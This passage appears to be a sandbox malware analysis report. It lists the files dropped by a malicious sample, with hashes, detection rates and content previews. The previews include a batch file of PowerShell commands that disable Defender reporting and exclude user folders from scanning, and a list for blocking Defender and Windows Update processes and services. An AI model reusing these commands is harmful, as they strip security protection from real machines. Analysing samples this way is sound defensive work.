                                                                                                                                                Entropy (8bit):6.2041507656664825
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                                                                                                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                                                                                                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                                                                                                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                                                                                                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456534
                                                                                                                                                Entropy (8bit):5.450314708570292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                                                                                                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                                                                                                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                                                                                                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                                                                                                                                                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10480965
                                                                                                                                                Entropy (8bit):6.710750822103746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                                                                                                                                                MD5:458F2D710689EA3CF61D5CD97C6B2470
                                                                                                                                                SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                                                                                                                                                SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                                                                                                                                                SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:DOS batch file, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):259
                                                                                                                                                Entropy (8bit):4.933902901538645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                                                                                                                                MD5:261A842203ADB67547C83DE132C7A076
                                                                                                                                                SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                                                                                                                                SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                                                                                                                                SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3745
                                                                                                                                                Entropy (8bit):5.5088592721875305
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:i68J9VLDT0HU0Hn0H1QE0He0H+kQHR3VPzFW0HMVVHBHR0HMttHMH:/OT/T000H0GE0+0TQxlPzFW0AVhx0Ct2
                                                                                                                                                MD5:1A6D604458150AD8DA33BDD29F3B84BB
                                                                                                                                                SHA1:99A4E1994A0E4B868EBBBB838DC7EB342F2B8CBC
                                                                                                                                                SHA-256:76CC45F29FAE72234E83A0986C78366F5B5CF711F55C60B118EA9EA3C72070C7
                                                                                                                                                SHA-512:19C7A4793D6E1C74C53C4E6DFC2AEA28F3514EEAEF462B44093DF4108F245FCBB9437C9663A5104866F58023A004C3A0361E06F6B47E5D56F86B1A4D41C1973F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10669056
                                                                                                                                                Entropy (8bit):7.443816651911507
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
                                                                                                                                                MD5:2F829F1CB631D234C54F2E6C6F72EB57
                                                                                                                                                SHA1:BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
                                                                                                                                                SHA-256:09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
                                                                                                                                                SHA-512:71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):98304
                                                                                                                                                Entropy (8bit):6.298274541598319
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                                                                                                                                                MD5:319865D78CC8DF6270E27521B8182BFF
                                                                                                                                                SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                                                                                                                                                SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                                                                                                                                                SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
                                                                                                                                                File Type:Generic INItialization configuration [svc]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):195
                                                                                                                                                Entropy (8bit):4.692426693515089
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                                                                                                                                                MD5:E025B58CB2D118FAFAE00850EE91C5F9
                                                                                                                                                SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                                                                                                                                                SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                                                                                                                                                SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21915
                                                                                                                                                Entropy (8bit):5.097909774076672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:abbEbNQ6s69WS8vv88o88888888888888j8888888888e88888880888888888AA:abbEbNQ6s69WS8vv88o888888888888v
                                                                                                                                                MD5:DC054B75BDFB351BDF2328E6851D328E
                                                                                                                                                SHA1:2A9E461CFEECC61E9E708BEFAD840DC413CB851E
                                                                                                                                                SHA-256:3F9EC2FB04F5FFEFED7E0245E0BB2BE99E03CAF7F960961EC9DF05F5D4CA1CC4
                                                                                                                                                SHA-512:D73E56AA3D6EDB791628B300616F07C0CE2FA7F24C19470A2958D0E647E226DCF6FDA3EAB97B2103A3D25D32E70FC24C7CE9DFF49C48182933663DDB1D0D7AD5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) ->
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):129536
                                                                                                                                                Entropy (8bit):6.2852879161990645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                                                                                                MD5:88E6178B0CD434C8D14710355E78E691
                                                                                                                                                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                                                                                                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                                                                                                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37376
                                                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105984
                                                                                                                                                Entropy (8bit):6.285421743969757
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                                                                                                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                                                                                                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                                                                                                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                                                                                                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.193969228624904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                                                                                                                                                MD5:EC9499EE84ED09B77BE0A35EC87B781C
                                                                                                                                                SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                                                                                                                                                SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                                                                                                                                                SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75977
                                                                                                                                                Entropy (8bit):7.8696816318811385
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                                                                                                MD5:E53A179BB45CD7EDD8371740D65076BD
                                                                                                                                                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                                                                                                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                                                                                                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.25860377459178
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                                                                                                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                                                                                                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                                                                                                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                                                                                                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9146880
                                                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8568
                                                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):91136
                                                                                                                                                Entropy (8bit):6.2041507656664825
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                                                                                                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                                                                                                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                                                                                                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                                                                                                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
